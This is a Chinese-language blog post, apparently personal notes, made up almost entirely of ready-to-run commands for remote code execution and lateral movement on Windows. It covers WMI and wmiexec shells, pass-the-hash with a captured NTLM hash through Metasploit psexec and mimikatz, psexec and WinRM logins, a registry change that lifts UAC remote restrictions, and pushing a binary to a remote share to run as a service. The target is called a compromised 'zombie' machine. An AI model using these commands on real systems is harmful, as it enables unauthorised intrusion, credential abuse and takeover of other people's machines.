Windows遠程執行cmd命令的方法

覺得對自己有用 於是就記錄下來了

WMI執行命令(普通權限可以進行hash傳遞):

無回顯執行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt"

利用wmiexec工具配合進行反彈半交互shell:cscript.exe //nologo wmiexec.vbs /shell 10.10.10.21 Administrator 123456


2.使用Hash直接登錄Windows(HASH傳遞):

抓取windows hash值,得到administrator的hash:

598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

然後利用psexec進行HASH傳遞:

msf調用payload:
use exploit/windows/smb/psexec
show options
set RHOST 192.168.81.129
set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
set SMBUser Administrator
show options
run

3. mimikatz傳遞hash方式連接+at計劃任務執行命令:

mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" 
//傳遞hash
dir \\192.168.1.185\c$

4.psexec.exe遠程執行命令

psexec /accepteula //接受許可協議
sc delete psexesvc
psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe

5.winrm遠程執行命令

//肉機上面快速啓動winrm服務,並綁定到5985端口:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
netstat -ano|find "5985"
//客戶端連接方式:
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd
//UAC問題,修改後,普通管理員登錄後也是高權限:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"

6.遠程命令執行sc命令

net use \\192.168.17.138\c$ "admin123" /user:pt007
net use
dir \\192.168.17.138\c$
copy test.exe \\192.168.17.138\c$
sc \\192.168.17.138 create test binpath= "c:\test.exe"
sc \\192.168.17.138 start test
sc \\192.168.17.138 del test
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章